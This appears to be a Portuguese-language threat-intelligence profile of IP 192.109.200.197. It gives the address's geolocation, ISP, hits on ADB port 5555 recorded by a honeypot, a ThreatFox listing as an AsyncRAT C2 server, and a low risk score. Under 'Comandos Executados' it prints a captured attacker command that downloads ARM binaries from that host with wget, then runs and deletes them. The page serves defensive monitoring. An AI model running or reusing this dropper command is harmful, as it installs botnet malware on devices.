TROYANOSYVIRUS
Ameaca AtivaBAIXO

192.109.200.197

Pais de Origem🇧🇬 BG
Primeira Deteccao20/04/2026
Ultima Atividade20/04/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
6
Ataques Totais
🔌
1
Portas
📡
1
Tipos de Ataque
🦠
0
Malware

Geolocalizacao

Pais
🇧🇬 BG
Cidade
Desconhecida
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Tipos de Ataque

adb_honeypot

Portas Atacadas

5555

Malware Associado

Sem malware associado

Comandos Executados

$cd /data/local/tmp/; busybox wget http://192.109.200.197/armv5l; chmod +x armv5l; ./armv5l; wget http://192.109.200.197/armv6l; chmod +x armv6l; ./armv6l; wget http://192.109.200.197/armv7l; chmod +x armv7l; ./armv7l; rm -rf arm*2x

ThreatFox Intelabuse.ch

⚠️SERVIDOR C2 CONHECIDO
Familias de Malware
win.asyncrat
Tipos de Ameaca
botnet_cc
Confianca: 100%

Exposicao Shodan InternetDBShodan

Dados InternetDB, nao em tempo real

Portas
445338959855986
Hostnames
longingtank.ptr.network

Avaliacao de Risco

10
/100
BaixoMedioAltoCritico